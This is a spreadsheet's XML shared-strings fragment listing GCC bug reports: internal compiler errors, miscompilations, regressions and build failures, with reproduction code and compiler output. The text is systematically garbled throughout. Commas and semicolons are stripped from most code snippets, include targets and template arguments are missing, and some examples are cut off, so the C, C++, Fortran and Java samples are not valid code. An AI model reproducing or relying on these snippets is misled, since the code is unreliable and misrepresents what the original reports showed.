$ clang++ -std=c++0x bug.cpp
$
GCC versions 4.4.3 4.6.2 and 4.7.1 give parse errors on the marked lines. Clang 3.0 doesn't complain.
Note that g() parses fine.</t>
  </si>
  <si>
    <t>GCC-811</t>
  </si>
  <si>
    <t>g++/i686-pc-linux-gnu: -O0 generate bad code (faulty temporary ?)</t>
  </si>
  <si>
    <t>Attached File miscompiles wenn disabling optimisation (-O0)
on Intel-PCs:
&gt; g++ -O0 point_bug.cc -o point_bug &amp;&amp; ./point_bug
p1: (34)  p2: (56)
((p1+p2)/2): (40)
&gt; g++ -O1 point_bug.cc -o point_bug &amp;&amp; ./point_bug
p1: (34)  p2: (56)
((p1+p2)/2): (45)
Introducing an explizit temporary avoid this Problem:
Point tmp=p1+p2 tmp/=2
Release:
gcc-2.7.2.3 up to gcc-2.92.2
Environment:
debian potato: linux 2.2.16 glibc 2.1.3
Pentium III
Not redhat gcc-2.96 (gcc-20001113 didn't work for me)
-- or --
Redhat 6? and AMD-K7</t>
  </si>
  <si>
    <t>homann</t>
  </si>
  <si>
    <t>GCC-3401</t>
  </si>
  <si>
    <t>Critical problems with Gcc-3.0</t>
  </si>
  <si>
    <t>After having installed gcc-3.0 :
./configure --prefix=.....
make bootstrap 
make install
G++ is not able to compile my test file on Linux.
On AIX even 'g++ -v' fails to execute correctly
with the message :
g++ -v --&gt; exec(): 0509-036 Cannot load program gcc because of the
following errors:
        0509-130 Symbol resolution failed for gcc because:
        0509-136   Symbol stpcpy (number 69) is not exported from
                   dependent module /usr/lib/libc.a(shr.o).
        0509-136   Symbol strsignal (number 70) is not exported from
                   dependent module /usr/lib/libc.a(shr.o).
        0509-192 Examine .loader section symbols with the
                 'dump -Tv' command.
Release:
gcc version 3.0 (Thread model: single)
Environment:
i686-pc-linux-gnu &amp; powerpc-ibm-aix4.3.3.0
How-To-Repeat:
On i686-pc-linux-gnu :
======================
g++ -frepo -c tryg++.cc
g++ tryg++.o
Gives a **lot** of errors the first of those seems to be
a missing 'stddef.h' file in the installed libstdc++
(commented out in the generated Makefile)
On powerpc-ibm-aix4.3.3.0 :
===========================
Just typing 'g++ -v' should do ...</t>
  </si>
  <si>
    <t>GCC-71458</t>
  </si>
  <si>
    <t>ICE with -fsanitize=bounds</t>
  </si>
  <si>
    <t>Created attachment 38663
preprocessed file that fails
Seen with the released 5.4.0 build for Linux
Version: GCC 5.4
System Type: Linux barto-VirtualBox 3.16.0-69-generic #89~14.04.1-Ubuntu SMP Thu Mar 17 20:51:04 UTC 2016 x86_64 GNU/Linux
Options when configured
    ../configure --prefix=/opt/ubuntu-tools-5.4 \
        --program-suffix=-5.4.0 \
	--disable-multilib \
        --with-system-zlib \
        --enable-lto \
        --enable-tls \
        --enable-libmpx \
	--enable-languages=cc++
Command line
/home/barto/UnixEnvironment/CSI/asan/toolchain/ubuntu-tools-5.4/bin/g++-5.4.0 -DUSE_GCC54 -c -o /home/barto/UnixEnvironment/CSI/asan/obj/tools/enum_scraper.o -ggdb -DGCC5=1 -DLINUX=1 -DUSE_ADDRESS_SANITIZER -DUSE_SANTYPE_BOUNDS -fsanitize=bounds -fcheck-pointer-bounds -mmpx -fPIE -pie -fno-omit-frame-pointer -fno-optimize-sibling-calls -pipe -march=core2 -m64 -funroll-loops -funit-at-a-time -finline-functions -fweb -frename-registers -funswitch-loops -ftree-vrp -ftree-vectorize -ftree-slp-vectorize -mfpmath=sse -fstack-protector-strong -shared -finline-limit=4000 -DFRAME_SIZE -Werror -Wsign-compare -Wno-long-long -Wreturn-type -Wno-variadic-macros -Wignored-qualifiers -Wparentheses -Wuninitialized -Wno-unused-function -Wall -Wextra -Winvalid-pch -Wsign-promo -Wreorder -Warray-bounds -fdiagnostics-show-option -fno-strict-aliasing -D_BSD_SOURCE -std=gnu++11 -ggdb -UGPROF -I. -DUSE_DLMALLOC -DUSE_STD_MUTEX -D_GLIBCXX_USE_DEPRECATED=0 -DFULL_RESERVATIONS -DMEM_LIMIT_LEAK_CHECKING -UBIG_CLUSTER -UCOMM2A -Wno-type-limits -DUSE_ADDRESS_SANITIZER -DUSE_SANTYPE_BOUNDS -fsanitize=bounds -fcheck-pointer-bounds -mmpx -fPIE -pie -fno-omit-frame-pointer -fno-optimize-sibling-calls -DLINUX -DSYS=B4_2 -I/home/barto/UnixEnvironment/CSI/asan/obj/tools /home/barto/UnixEnvironment/CSI/asan/source/tools/enum_scraper.cpp
Output:
/home/barto/UnixEnvironment/CSI/asan/source/tools/enum_scraper.cpp:276:1: internal compiler error: Segmentation fault
 }
 ^
0xaa024f crash_signal
	../../gcc/toplev.c:383
0xb1df68 chkp_walk_pointer_assignments
	../../gcc/tree-chkp.c:3693
0xb1f56f chkp_finish_file()
	../../gcc/tree-chkp.c:3803
Preprocessed file: enum_scraper.ii</t>
  </si>
  <si>
    <t>barto</t>
  </si>
  <si>
    <t>GCC-16289</t>
  </si>
  <si>
    <t>Test intrinsic_nearest.f90 not portable?</t>
  </si>
  <si>
    <t>test execute/intrinsic_nearest.f90 is failing on irix
Reduced test case is:
program test_nearest
  real min
  integer mini
  equivalence (minmini)
  mini = 1
  call test_up(0 min)
end
subroutine test_up(s e)
  real s e x
  integer xi
  equivalence (xxi)
  x = nearest(s 1.0)
  if (x .ne. e) then
    write(6*) 's= ' s
    write(6*) 'e= ' e
    write(6*) 'x= ' x
    write(6*) 'xi= ' xi   
    call abort()
  end if
end
and output from this is 
 s=    0.000000    
 e=    0.000000    
 x=   1.1754943E-38    
 xi=      8388608
Looks to me like the representation of min using the equivalence
is wrong for irix and therefore the test is not portable.
Using the tiny() intrinsic works for me.  I will submit a patch.</t>
  </si>
  <si>
    <t>GCC-51116</t>
  </si>
  <si>
    <t>[4.7 Regression] configure: error: cannot compute suffix of object files: cannot compile</t>
  </si>
  <si>
    <t>In stage1
checking for hppa64-hp-hpux11.11-gcc... /test/gnu/gcc/objdir/./gcc/xgcc -B/test/gnu/gcc/objdir/./gcc/ -B/opt/gnu64/gcc/gcc-4.7/hppa64-hp-hpux11.11/bin/ -B/opt/gnu64/gcc/gcc-4.7/hppa64-hp-hpux11.11/lib/ -isystem /opt/gnu64/gcc/gcc-4.7/hppa64-hp-hpux11.11/include -isystem /opt/gnu64/gcc/gcc-4.7/hppa64-hp-hpux11.11/sys-include   
checking for suffix of object files... configure: error: in `/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libgcc':
configure: error: cannot compute suffix of object files: cannot compile
See `config.log' for more details.
In config.log
configure:3650: /test/gnu/gcc/objdir/./gcc/xgcc -B/test/gnu/gcc/objdir/./gcc/ -B
/opt/gnu64/gcc/gcc-4.7/hppa64-hp-hpux11.11/bin/ -B/opt/gnu64/gcc/gcc-4.7/hppa64-
hp-hpux11.11/lib/ -isystem /opt/gnu64/gcc/gcc-4.7/hppa64-hp-hpux11.11/include -i
system /opt/gnu64/gcc/gcc-4.7/hppa64-hp-hpux11.11/sys-include    -c -g -O2  conf
test.c &gt;&amp;5
/var/tmp//ccjq1spX.s: Assembler messages:
/var/tmp//ccjq1spX.s:44: Error: can't resolve `.text.startup' {.text.startup sec
tion} - `L$FB0000' {*UND* section}
/var/tmp//ccjq1spX.s:148: Error: can't resolve `.text.startup' {.text.startup se
ction} - `L$FB0000' {*UND* section}
configure:3654: $? = 1
configure: failed program was:
| /* confdefs.h */
| #define PACKAGE_NAME GNU C Runtime Library
| #define PACKAGE_TARNAME libgcc
| #define PACKAGE_VERSION 1.0
| #define PACKAGE_STRING GNU C Runtime Library 1.0
| #define PACKAGE_BUGREPORT 
| #define PACKAGE_URL http://www.gnu.org/software/libgcc/
| /* end confdefs.h.  */
| 
| int
| main ()
| 
|   
|   return 0
| }</t>
  </si>
  <si>
    <t>GCC-20199</t>
  </si>
  <si>
    <t>-fvisibility-inlines-hidden broken on powerpc64-linux</t>
  </si>
  <si>
    <t>The C++ option -fvisibility-inlines-hidden doesn't work on powerpc64-linux.
I don't understand the problem well enough to describe it well or to
provide a small test case that doesn't depend on using libstdc++.  The
problem shows up with anything that uses  and also with the
test g++.old-deja/g++.pt/ttp19.C which uses .
With current mainline and binutils 2.15 a program links successfully but
dies at runtime with an illegal instruction apparently trying to execute
data.  With binutils from CVS the link fails for ttp19.C the message is
elm3b11% $INST/bin/g++ -m64 -fvisibility-inlines-hidden ttp19.C
.../bin/ld: /tmp/ccR7UhuH.o(.text+0x48): unresolvable R_PPC64_REL24 relocation
against symbol `std::allocator::allocator()@@GLIBCXX_3.4'
.../bin/ld: /tmp/ccR7UhuH.o(.text+0x60): unresolvable R_PPC64_REL24 relocation
against symbol `std::allocator::~allocator()@@GLIBCXX_3.4'
.../bin/ld: final link failed: Nonrepresentable section on output
collect2: ld returned 1 exit status
This might well be a binutils problem rather than a GCC problem although
a fix to binutils will also require updated GCC documentation about which
version of binutils is required for powerpc64-linux.</t>
  </si>
  <si>
    <t>GCC-35443</t>
  </si>
  <si>
    <t>[4.2/4.3/4.4 regression] Completely broken diagnostic with bind_expr</t>
  </si>
  <si>
    <t>A broken diagnostic is issued for the following invalid code snippet
since GCC 4.1.0:
==================================================
void foo()
{
  ({ int i })()
}
==================================================
#'bind_expr' not supported by pp_c_expression#'bug.c: In function 'foo':
bug.c:3: error: called object  is not a function
Similar to PR35441.</t>
  </si>
  <si>
    <t>GCC-45886</t>
  </si>
  <si>
    <t>[ARM] support for __ARM_PCS_VFP predefined symbol in gcc 4.5.x would be very nice</t>
  </si>
  <si>
    <t>This is quite important for JIT code when we want so support all ABI variants properly. Because now gcc 4.5.x supports -mfloat-abi=hard being able to identify its use is also needed.</t>
  </si>
  <si>
    <t>GCC-35590</t>
  </si>
  <si>
    <t>Value profiling: string op -- requires power of 2 value??</t>
  </si>
  <si>
    <t>value profiling transformation does not kick in for the following simple program. Looks like it requires power of 2 values to dominate.  It is probably not due to design but simply lack of unit testing for feature.
#include 
void mycpy (char* s1 char *s2 int n) __attribute__((noinline))
void mycpy (char* s1 char *s2 int n)
{
  memcpy(s1s2n)
}
int main()
{
   char *s1 = malloc(100000)
   char *s2 = malloc(100000)
   int i
   for ( i = 0  i &lt; 100000 i ++)
   {
        mycpy(s1s2 129)
   }
}</t>
  </si>
  <si>
    <t>xinliangli</t>
  </si>
  <si>
    <t>GCC-14007</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression] Incorrect use of const partial specialization for reference template argument</t>
  </si>
  <si>
    <t>Consider the following test program:
    #include 
    template  struct X          { enum { val = 0 } }
    template  struct X { enum { val = 1 } }
    int main() {
      printf(%d\n X&lt;int
    }
The value printed is 1.  That is the 3.x compiler (tested with 3.1 3.3 and mainline) thinks that 
X refers to the X partial specialization rather than to the primary template.
I believe that this is wrong.  The partial specialization should only be used for a type that has a 
top-level const qualifier and references are not cv-qualified.  (8.3.2 paragraph 1).
This is a regression from 2.95.</t>
  </si>
  <si>
    <t>GCC-10792</t>
  </si>
  <si>
    <t>gcc -v -save-temps -o sambasearch sambasearch.cpp
Reading specs from /usr/lib/gcc-lib/i386-linux/3.2.3/specs
Configured with: ../src/configure -v --enable-languages=cc++javaf77objcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-java-gc=boehm --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.2.3
 /usr/lib/gcc-lib/i386-linux/3.2.3/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=3 -D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ sambasearch.cpp sambasearch.ii
GNU CPP version 3.2.3 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/3.2
 /usr/include/c++/3.2/i386-linux
 /usr/include/c++/3.2/backward
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/3.2.3/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-linux/3.2.3/cc1plus -fpreprocessed sambasearch.ii -quiet -dumpbase sambasearch.cpp -version -o sambasearch.s
GNU CPP version 3.2.3 (cpplib) (i386 Linux/ELF)
GNU C++ version 3.2.3 (i386-linux)
        compiled by GNU C version 3.2.3.
sambasearch.cpp: In member function `void SambaProcess::sambaGo()':
sambasearch.cpp:163: jump to case label
sambasearch.cpp:147:   crosses initialization of `int index2'
sambasearch.cpp:147:   crosses initialization of `int index1'
sambasearch.cpp:144:   crosses initialization of `std::string IP2'
sambasearch.cpp:142:   crosses initialization of `std::string IP1'
sambasearch.cpp:167: jump to case label
sambasearch.cpp:147:   crosses initialization of `int index2'
sambasearch.cpp:147:   crosses initialization of `int index1'
sambasearch.cpp:144:   crosses initialization of `std::string IP2'
sambasearch.cpp:142:   crosses initialization of `std::string IP1'
Internal compiler error: Error reporting routines re-entered.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.2.3
Environment:
Configured with: ../src/configure -v --enable-languages=cc++javaf77objcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-java-gc=boehm --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.2.3</t>
  </si>
  <si>
    <t>andrew.chant</t>
  </si>
  <si>
    <t>GCC-36575</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] ACATS c460011 fails at -O3</t>
  </si>
  <si>
    <t>When compiled with 4.2.4 at -O3 -gnato cg460011 passes:
.. C460011 ACATS 2.5 08-06-19 08:49:17
---- C460011 Check that conversion to a modular type raises
                Constraint_Error when the operand value is outside the
                base range of the modular type.
==== C460011 PASSED ============================.
Whereas when compiled at -O3 -gnato on 4.3.1 and 4.4 20080618 it fails:
.. C460011 ACATS 2.5 08-06-19 08:49:17
---- C460011 Check that conversion to a modular type raises
                Constraint_Error when the operand value is outside the
                base range of the modular type.
==== C460011 PASSED ============================.
To reproduce:
$ gnatchop ../../trunk/gcc/testsuite/ada/acats/support/rep* ../../trunk/gcc/testsuite/ada/acats/tests/c4/c460011.a
$ gnatmake -O3 -gnato c460011.adb
$ ./c460011</t>
  </si>
  <si>
    <t>GCC-23180</t>
  </si>
  <si>
    <t>[4.1 regression] Segfault on const initializer with bogus pointer arithmetics</t>
  </si>
  <si>
    <t>falk@juist:/tmp% cat bug.cc   
void saveLoadEntries(const void *)
void saveOrLoad() {
    struct Track {
        char soundName[15]
    }
    struct SaveLoadEntry {
        int offs
        int type
        int size
    }    
    const SaveLoadEntry trackEntries = {
        ((long) (&amp;((Track *) 42)-&gt;soundName[0])) - 42
        0 1
    }
    saveLoadEntries(
}
falk@juist:/tmp% g++ -c bug.cc
bug.cc:15: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
In case anyone wonders this comes from:
// * To work around a warning in GCC 3.2 (and 3.1 ?) regarding non-POD types[...]
#define OFFS(typeitem) (((long)(&amp;((type*)42)-&gt;type::item))-42)
This is of course invalid but it'd be nice if it did what those folks wanted.</t>
  </si>
  <si>
    <t>GCC-2831</t>
  </si>
  <si>
    <t>operator ?: requires storage for initialized static member constants</t>
  </si>
  <si>
    <t>When compiling an executable from the included source code g++ produces the following error messages:
/tmp/cce1LkFy.o: In function `main':
/tmp/cce1LkFy.o(.text+0xd): undefined reference to `foo_class::flag1    '
/tmp/cce1LkFy.o(.text+0x19): undefined reference to `foo_class::flag2    '
collect2: ld returned 1 exit status
I verified this with the gcc online compiler submission form at http://www.codesourcery.com/gcc-compile.shtml
The form said:
The compiler used in this form was last updated from the nightly build on 2001-05-15 . 
The sources were checked out from the gcc-3_0-branch branch of the GCC CVS repository.
The same problem occurs in the gcc that ships with red hat linux 7.1:  gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
Release:
gcc version 3.0 20010515 (prerelease)
Environment:
Red Hat Linux 7.1 (kernel 2.4.2-2smp dual processor i686)
How-To-Repeat:
// undefref.cpp
/*
When compiled with gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
or gcc version 3.0 20010515 (prerelease)
the compiler produces the following error message:
/tmp/cceI5nKb.o: In function `main':
/tmp/cceI5nKb.o(.text+0xd): undefined reference to `foo_class::flag1'
/tmp/cceI5nKb.o(.text+0x19): undefined reference to `foo_class::flag2'
collect2: ld returned 1 exit status
*/
class foo_class
	{
	public:
		// flag1 &amp; flag2 are initialized static integral constants
		// as described in Stroustrup 3: section 10.4.6.2: Member Constants.
		// The are never used in a way that requires them to be stored as
		// objects in memory so they should not require a separate definition.
		static const int flag1 = (1 &lt;&lt; 0)
		static const int flag2 = (1 &lt;&lt; 1)
	}
// According to Stroustrup these should not be necessary:
//const int foo_class::flag1
//const int foo_class::flag2
int main( int argc char *argv[])
	{
	// This line produces the undefined reference error:
	int flags = (argc == 1) ? foo_class::flag1 : foo_class::flag2
	// This line is just fine:
	int aflags = foo_class::flag1
	return 0
	}</t>
  </si>
  <si>
    <t>fspam, at,</t>
  </si>
  <si>
    <t>GCC-1294</t>
  </si>
  <si>
    <t>gcj does not complain about abstract classes</t>
  </si>
  <si>
    <t xml:space="preserve">Responsible-Changed-From-To: apbianco-&gt;tromey
Responsible-Changed-Why: I fixed it.
</t>
  </si>
  <si>
    <t>GCC-67338</t>
  </si>
  <si>
    <t>fold-const sanitizer runtime error  in roundup_loc</t>
  </si>
  <si>
    <t>Running a sanitized version of gcc 5.2.0 I get the following: 
// ../../gcc-5.2.0/gcc/fold-const.c:16036:8: runtime error: negation of -2147483648 cannot be represented in type 'int' cast to an unsigned type to negate this value to itself
// fold-const.c:16036 val 
// int should be wide_int?
// Target: x86_64-unknown-linux-gnu
// COLLECT_GCC_OPTIONS='-mtune=generic' '-march=x86-64'
struct { __attribute__((aligned (1 &lt;&lt; 28))) double a }</t>
  </si>
  <si>
    <t>GCC-60640</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE edge points to wrong declaration / verify_cgraph_node failed</t>
  </si>
  <si>
    <t>Created attachment 32438
Reduced C++ testfile.ii compile with -O3
Follow-up to PR59176
ICE with -O3 in verify_cgraph_node. (-O2 is fine.)
(In reply to David Binderman from PR59176 comment #15)
&gt; Created attachment 32434 [details]
&gt; gzipped C++ source code
 (In reply to Martin Jambor from PR59176 comment #17)
&gt; Although the ICE message is the same this is most certainly a
&gt; different bug as it happens at a different time during the compilation
&gt; process.  I will look it at it some more tomorrow.</t>
  </si>
  <si>
    <t>GCC-27812</t>
  </si>
  <si>
    <t>Classpath AWT Demo: anonymous class call miscompilation</t>
  </si>
  <si>
    <t>GCJ miscompiles part of the classpath AWT demo application in:
classpath/examples/gnu/classpath/examples/awt/Demo.java
In an anonoymous inner class ActionListener implementation an unqualified call to a superclass of the outer class is called on this instead of the outer class.
This happens with either source-&gt;native or source-&gt;bytecode compilation.
class Super
{
    void dispose()
    {
      System.out.println(OK)
    }
}
public class PR27812
{
  public static void main(String[] args)
  {
    Y y = new Y()
    y.y()
  }
  static interface I
  {
    abstract void actionPerformed()
  }
  static class Y extends Super
  {
    void y()
    {
      new I () {
	  public void actionPerformed () {
	    dispose()
	  }
	}.actionPerformed()
    }
  }
}
$ gcj -C PR27812.java
$ gij PR27812
Exception in thread main java.lang.NoSuchMethodError: method PR27812$Y$1.dispose with signature ()V was not found.
   at PR27812$Y$1.actionPerformed (PR27812.java:28)
   at PR27812$Y.y (PR27812.java:30)
   at PR27812.main (PR27812.java:14)</t>
  </si>
  <si>
    <t>GCC-47237</t>
  </si>
  <si>
    <t>[4.5 Regression] builtin_apply_args broken WRT local ABI changes.</t>
  </si>
  <si>
    <t>#define INTEGER_ARG  5
extern void abort(void)
static void foo(int arg)
{
  if (arg != INTEGER_ARG)
    abort()
}
static void bar(int arg)
{
  foo(arg)
  __builtin_apply(foo __builtin_apply_args() 16)
}
int main(void)
{
  bar(INTEGER_ARG)
  return 0
}
fails at 32bit.  The problem is that we call bar with register calling conventions while foo's calling conventions are default.
We must prevent any call conventions changes on functions calling builtlin_apply.
This is not only case where builtin_apply_args breaks since we will happily clone the functions too.
I guess in addition to inlinable and cloning flag we need flag whether function calling convention can change. In what conditions this is false in addition to apply_args?
This bug probably exists since GCC 3.4. I tested 4.3 and 4.5 to fail.</t>
  </si>
  <si>
    <t>GCC-50344</t>
  </si>
  <si>
    <t>friend declaration confused by const qualifier</t>
  </si>
  <si>
    <t>template  class C
{
   friend T
   int i
}
struct S
{
    int f()
    {
       C c
       return c.i
    }
}
This is valid C++11 but fails with:
ac.cc: In member function 'int S::f()':
ac.cc:4:8: error: 'int C::i' is private
ac.cc:12:17: error: within this context
The problem is that the friend declaration names const S so S is not considered a friend it works if C is used.  The standard says If the type specifier in a friend declaration designates a (possibly cv-qualified) class type that class
is declared as a friend
This bug predates the implementation of the C++0x extended friend rules as shown by this example using a non-standard friend declaration supported by G++:
template struct identity { typedef T type }
template  class C
{
   friend class identity::type
   int i
}
struct S
{
    int f()
    {
       C c
       return c.i
    }
}
This works with all versions of G++ is C is used but not C</t>
  </si>
  <si>
    <t>GCC-48463</t>
  </si>
  <si>
    <t>gcov does not handle C++ clones (deleting ctors template instantiations)</t>
  </si>
  <si>
    <t>Created attachment 23882
1.png 2.png src/ (has 3 source files)
Gcov is generating a lot of useless output when it comes to function coverage. The problem really came to our attention when looking at classes with virtual destructors like the one in the following class example:
[code]
class ClassA
{
public:
        ClassA()
        virtual ~ClassA()
}
class ClassB : public ClassA
{
public:
        ClassB()
        ~ClassB()
}
[/code]
The list of function names then contains three destructors for ClassA (two of which are apparently not called one which is) and three destructors for ClassB (two of which are apparently not called one which is). They all have the same signature. When disabling then genhtml option --demangle-cpp or by viewing the .gcov files you can see that each of these destructors (of ClassA for example) has a different name. Example (excerpt of gcov file for classA.cpp):
Function '_ZN6ClassAD0Ev'
Lines executed:0.00% of 3
Branches executed:0.00% of 2
Taken at least once:0.00% of 2
Calls executed:0.00% of 3
Function '_ZN6ClassAD1Ev'
No executable lines
Branches executed:0.00% of 2
Taken at least once:0.00% of 2
Calls executed:0.00% of 3
Function '_ZN6ClassAD2Ev'
No executable lines
Branches executed:100.00% of 2
Taken at least once:50.00% of 2
Calls executed:66.67% of 3
The mangled names differ only in the parts: D0 D1 D2. It's odd that one destructor apparently has 3 executable lines (in the attached source you can see it's only one line) and that the two others have no executable lines yet they have branches that can be covered. 
These IDs 'D0' 'D1' 'D2' are given to the mangled function names by the gcc compiler yet I am unsure of what the difference is supposed to be. 
Nevertheless it isn't really of interest to the person analyzing the coverage of his code what gcc generates in the background. Only those desctructors that the programmer can actually see in HIS code should show up in the list of covered (or not covered) functions. 
This goes for the other functions that show up in the example's list as well:
global destructors keyed to _ZN6ClassAC2Ev 
global constructors keyed to _ZN6ClassAC2Ev
__static_initialization_and_destruction_0(int int)
It leads to wrong numbers for the function and branch coverage of what you really want to see.
To reproduce:
I wrote a two classes: ClassA and ClassB. ClassA has a public constructor (no args just prints something) and a public virtual destructor (no args just prints something). ClassB inherits from ClassA (publicly) and has a public constructor (no args just prints something) and a public destructor (no args just prints something). The main file just creates an instance of ClassB stores it in a pointer to ClassA and calls delete on that pointer variable. 
The source files were compiled using:
g++ -fprofile-arcs -ftest-coverage -o prog main.cpp classA.cpp
Then ./prog was run once.
A .info file was generated using lcov (version 1.9) in the following command:
lcov -d . -c -f -o NewInfo.info
The final html overview was generated using genhtml (also version 1.9) in the following command:
genhtml --demangle-cpp --prefix . -o html/ NewInfo.info 
Alternatively to reproduce you can also use the attached source files. The attachment also include two pictures displaying a listing of all the functions that have apparently been covered or not covered.
Hope this info helps solve the problem. 
Chris</t>
  </si>
  <si>
    <t>lieutenantfeist</t>
  </si>
  <si>
    <t>GCC-52435</t>
  </si>
  <si>
    <t>ICE in arm_select_dominance_cc_mode at config/arm/arm.c:10625</t>
  </si>
  <si>
    <t>Created attachment 26784
test case
seen with 4.5 and 4.6 with -O1. Other optimization levels don't show the ICE.
$ gfortran -c -O1 -fpermissive -Wfatal-errors -w fbasics_gss-min.f
fbasics_gss-min.f: In function 'deval':
fbasics_gss-min.f:39:0: internal compiler error: in arm_select_dominance_cc_mode at config/arm/arm.c:11474
Please submit a full bug report
with preprocessed source if appropriate.
trunk 20120107 has a different ICE:
$ /usr/lib/gcc-snapshot/bin/gfortran -c -O1 -fpermissive -Wfatal-errors -w fbasics_gss-min.f
fbasics_gss-min.f:139:0: internal compiler error: vector VEC(treebase) index domain error in ipa_get_indirect_edge_target at ipa-cp.c:1115
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-2120</t>
  </si>
  <si>
    <t>error 19990919 occurs in compilation</t>
  </si>
  <si>
    <t xml:space="preserve">        Command Line
g++ -g -Wall -lm -o wire2D wire2D.cc
    Compiler Output
wire2D.cc:191: redefinition of `WirePositions::WirePositions (const
CoilDefinition &amp; const string &amp;)'
wire2D.hxx:68: `WirePositions::WirePositions (const CoilDefinition &amp;
const string &amp;)' previously defined here
wire2D.cc: In method `WirePositions::WirePositions (const
CoilDefinition &amp; const string &amp;)':
wire2D.cc:191: Internal error #19990919.
wire2D.cc:191: Internal compiler error in setup_vtbl_ptr at
../gcc/cp/semantics.c:1203
Please submit a full bug report.
See  for instructions.
make: *** [wire2D] Error 1                                                      
      gcc Version (Redhat 7 precompiled) build date 23-Aug-2000
[thompson@linuxpat wirecodes]$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.0)         
(gcc-c++-2.96-54)
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
Intel 586
How-To-Repeat:
occurs everytime at  compilation.</t>
  </si>
  <si>
    <t>pat_n_cats</t>
  </si>
  <si>
    <t>GCC-70064</t>
  </si>
  <si>
    <t>Wrong code with custom flags and quite big testcase @ i686</t>
  </si>
  <si>
    <t>Created attachment 37854
autoreduced testcase
The testcase is likely very fragile due to the set of compiler flags and quite big testcase itself. Neither seems to be easily reducible.
Output:
$ i686-pc-linux-gnu-gcc -Os -march=athlon-tbird -fPIC -fsched-pressure -fsched-stalled-insns -fschedule-insns -fno-tree-reassoc -momit-leaf-frame-pointer -mpclmul -mred-zone -mno-stv -fira-algorithm=priority --param=max-sched-ready-insns=0 testcase.c -Wno-psabi
$ ./a.out 
0000318f9e133048
Aborted
$ i686-pc-linux-gnu-gcc -v
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest-i686/bin/i686-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-233911-checking-yes-rtl-df-nographite-i686/bin/../libexec/gcc/i686-pc-linux-gnu/6.0.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-checking=yesrtldf --without-cloog --without-ppl --without-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=i686-pc-linux-gnu --with-ld=/usr/bin/i686-pc-linux-gnu-ld --with-as=/usr/bin/i686-pc-linux-gnu-as --with-sysroot=/usr/i686-pc-linux-gnu --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-233911-checking-yes-rtl-df-nographite-i686
Thread model: posix
gcc version 6.0.0 20160302 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-32009</t>
  </si>
  <si>
    <t>[4.3 Regression] building gcc4-4.3/4.4.0-20070518 failed on OSX 10.3.9</t>
  </si>
  <si>
    <t>Building gcc4-4.3.0-20070518 failed on OSX 10.3.9. Copies of
http://gcc.gnu.org/ml/gcc/2007-05/msg00483.html
&gt; Comparing the log of successful and failed builds I have found 
&gt; that the failed one contains -mdynamic-no-pic which does not
&gt; appear in the previous build.  According Apple's doc this
&gt; should be used in application but it should not appear
&gt; when building libraries (at least it is my understanding).
&gt;
&gt; I suspect the origin of the problem comes from
&gt;
&gt; 2007-05-16  Paolo Bonzini  
&gt;
&gt;         * Makefile.def (bootstrap_stage): Replace stage_make_flags with
&gt;         stage_cflags.
&gt;         * Makefile.tpl (POSTSTAGE1_HOST_EXPORTS POSTSTAGE1_FLAGS_TO_PASS):
&gt;         Remove CFLAGS/LIBCFLAGS.
&gt;         (configure-stage[+id+]-[+prefix+][+module+]
&gt;         all-stage[+id+]-[+prefix+][+module+]): Pass it from [+stage_cflags+].
&gt;        * Makefile.in: Regenerate.
&gt;
&gt; but there are too many changes to allow me to go further.
&gt;
&gt; BTW I also noticed the nicety
&gt;
&gt; ... -O2 -O2 -g -O2 ... -g -O2 ...
&gt;
&gt; (was ... -O2 -O2 -g -O2 ... -O2 -g -O2 ...)
http://gcc.gnu.org/ml/gcc/2007-05/msg00485.html
form Andreas Tobler
&gt; Thanks Dominique I just reverted this patch to see if I get further. 
&gt; I have the same problem on 10.4.9 and was to lazy to investigate 
&gt; that deep as you did.
&gt; I'll let you know how it works.
&gt;
&gt; In toplevel svn up -r 124763 Makefile.tpl Makefile.def Makefile.in
and
http://gcc.gnu.org/ml/gcc/2007-05/msg00487.html
&gt; &gt; In toplevel svn up -r 124763 Makefile.tpl Makefile.def Makefile.in
